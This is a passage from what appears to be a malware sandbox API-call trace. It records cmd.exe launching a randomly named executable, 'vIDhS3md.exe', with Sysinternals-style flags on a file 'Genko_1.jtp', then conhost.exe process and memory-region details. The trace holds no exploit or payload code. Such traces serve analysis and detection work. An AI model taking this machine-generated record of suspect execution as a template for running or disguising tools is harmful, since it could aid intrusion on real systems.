hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa6e7fc, lpData=0xa6e804, lpcbData=0xa6e800*=0x1000 | out: lpType=0xa6e7fc*=0x0, lpData=0xa6e804*=0x9, lpcbData=0xa6e800*=0x1000) returned 0x2 [0266.131] RegCloseKey (hKey=0x94) returned 0x0 [0266.131] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43292 [0266.131] srand (_Seed=0x5bb43292) [0266.131] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner" [0266.131] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner" [0266.131] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.131] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xe17f50, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0266.131] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.131] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.131] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0266.131] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.131] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0266.131] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0266.131] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0266.131] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0266.131] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0266.131] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0266.131] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0266.131] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0266.131] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0266.132] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa6f5d0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.132] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xa6f5d0, lpFilePart=0xa6f5c8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa6f5c8*="Desktop") returned 0x1d [0266.132] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0266.132] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6f350 | out: lpFindFileData=0xa6f350) returned 0xe18160 [0266.132] FindClose (in: hFindFile=0xe18160 | out: hFindFile=0xe18160) returned 1 [0266.132] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xa6f350 | out: lpFindFileData=0xa6f350) returned 0xe18160 [0266.132] FindClose (in: hFindFile=0xe18160 | out: hFindFile=0xe18160) returned 1 [0266.132] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0266.132] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xa6f350 | out: lpFindFileData=0xa6f350) returned 0xe18160 [0266.132] FindClose (in: hFindFile=0xe18160 | out: hFindFile=0xe18160) returned 1 [0266.132] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0266.132] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0266.132] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0266.133] GetEnvironmentStringsW () returned 0xe1a090* [0266.133] FreeEnvironmentStringsA (penv="=") returned 1 [0266.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.133] GetConsoleOutputCP () returned 0x1b5 [0266.200] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0266.200] GetUserDefaultLCID () returned 0x409 [0266.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0266.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa6f700, cchData=128 | out: lpLCData="0") returned 2 [0266.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa6f700, cchData=128 | out: lpLCData="0") returned 2 [0266.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa6f700, cchData=128 | out: lpLCData="1") returned 2 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0266.201] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0266.201] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0266.202] GetConsoleTitleW (in: lpConsoleTitle=0xe18cf0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.203] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0266.203] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0266.203] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0266.203] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0266.204] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0266.204] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0266.204] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0266.204] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0266.204] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0266.204] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0266.204] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0266.205] GetConsoleTitleW (in: lpConsoleTitle=0xa6f3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.206] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0266.207] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0266.208] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0266.209] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0266.209] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0266.210] SetErrorMode (uMode=0x0) returned 0x0 [0266.210] SetErrorMode (uMode=0x1) returned 0x0 [0266.210] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xe1a098, lpFilePart=0xa6eef4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xa6eef4*="Desktop") returned 0x1d [0266.210] SetErrorMode (uMode=0x0) returned 0x1 [0266.210] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.210] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.216] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.216] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.216] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xa6eca0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6eca0) returned 0xe19468 [0266.217] FindClose (in: hFindFile=0xe19468 | out: hFindFile=0xe19468) returned 1 [0266.217] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0266.217] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0266.217] GetConsoleTitleW (in: lpConsoleTitle=0xa6f174, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.217] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6f0a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6f084 | out: lpAttributeList=0xa6f0a0, lpSize=0xa6f084) returned 1 [0266.217] UpdateProcThreadAttribute (in: lpAttributeList=0xa6f0a0, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6f08c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6f0a0, lpPreviousValue=0x0) returned 1 [0266.217] GetStartupInfoW (in: lpStartupInfo=0xa6f0d8 | out: lpStartupInfo=0xa6f0d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Gen", _MaxCount=0x7) returned -3 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0266.217] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0266.218] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0266.218] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0266.219] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xa6f028*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6f074 | out: lpCommandLine="vIDhS3md.exe -accepteula \"Genko_1.jtp\" -nobanner", lpProcessInformation=0xa6f074*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x204, dwThreadId=0xe48)) returned 1 [0266.225] CloseHandle (hObject=0xa4) returned 1 [0266.225] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0266.225] GetEnvironmentStringsW () returned 0xe18160* [0266.226] FreeEnvironmentStringsA (penv="=") returned 1 [0266.226] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0267.209] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6f00c | out: lpExitCode=0xa6f00c*=0x1) returned 1 [0267.209] CloseHandle (hObject=0xa8) returned 1 [0267.209] _vsnwprintf (in: _Buffer=0xa6f0f4, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6f014 | out: _Buffer="00000001") returned 8 [0267.209] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0267.209] GetEnvironmentStringsW () returned 0xe18160* [0267.209] FreeEnvironmentStringsA (penv="=") returned 1 [0267.209] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0267.209] GetEnvironmentStringsW () returned 0xe18160* [0267.210] FreeEnvironmentStringsA (penv="=") returned 1 [0267.210] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6f0a0 | out: lpAttributeList=0xa6f0a0) [0267.210] _get_osfhandle (_FileHandle=1) returned 0xc0 [0267.210] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0267.210] _get_osfhandle (_FileHandle=1) returned 0xc0 [0267.210] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0267.210] _get_osfhandle (_FileHandle=0) returned 0x38 [0267.210] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0267.210] SetConsoleInputExeNameW () returned 0x1 [0267.210] GetConsoleOutputCP () returned 0x1b5 [0267.210] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0267.210] SetThreadUILanguage (LangId=0x0) returned 0x409 [0267.211] exit (_Code=1) Thread: id = 844 os_tid = 0xef4 Process: id = "90" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1584d000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0xf04" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6608 start_va = 0x7f632000 end_va = 0x7f632fff entry_point = 0x0 region_type = private name = "private_0x000000007f632000" filename = "" Region: id = 6609 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6610 start_va = 0xfdefa90000 end_va = 0xfdefaaffff entry_point = 0x0 region_type = private name = "private_0x000000fdefa90000" filename = "" Region: id = 6611 start_va = 0xfdefab0000 end_va = 0xfdefac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fdefab0000" filename = "" Region: id = 6612 start_va = 0xfdefad0000 end_va = 0xfdefb0ffff entry_point = 0x0 region_type = private name = "private_0x000000fdefad0000" filename = "" Region: id = 6613 start_va = 0x7df5ffc10000 end_va = 0x7ff5ffc0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc10000" filename = "" Region: id = 6614 start_va = 0x7ff7fc560000 end_va = 0x7ff7fc582fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc560000" filename = "" Region: id = 6615 start_va = 0x7ff7fc588000 end_va = 0x7ff7fc588fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc588000" filename = "" Region: id = 6616 start_va = 0x7ff7fc58e000 end_va = 0x7ff7fc58ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc58e000" filename = "" Region: id = 6617 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 6618 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 